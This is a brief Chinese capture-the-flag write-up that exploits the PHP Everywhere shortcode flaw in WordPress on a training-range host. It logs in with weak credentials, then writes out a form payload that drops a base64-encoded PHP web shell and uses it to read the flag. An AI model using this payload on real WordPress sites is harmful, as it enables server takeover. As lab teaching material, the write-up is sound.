简介
原文链接:https://culturesun.site/index.php/archives/701.html
是wordpress远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令。
本人使用春秋云境免费靶场在线搭建。
详解
- 打开首页,随便点点也没有发现什么,都没有登录、注册等入口。
- 使用
dirsearch
工具进行目录扫描。发现登录入口/wp-login.php
和注册入口/wp-signup.php
。但是不允许新用户注册 - 提示弱口令,进行弱口令扫描。用户名密码都是
test
。 - 登录到后台就好搞了。html插入
form
表单,然后提交
<form action="http://eci-2ze4sfovog5pgzhrpvut.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/shell.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW3NoZWxsXSk7ID8+")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
注意修改action
请求域名。
5. 访问木马----https://eci-2ze4sfovog5pgzhrpvut.cloudeci1.ichunqiu.com/shell.php?shell=cat%20/flag
获取flag。
结语
dirsearch
工具是kali自带的工具,可以看这篇博客了解。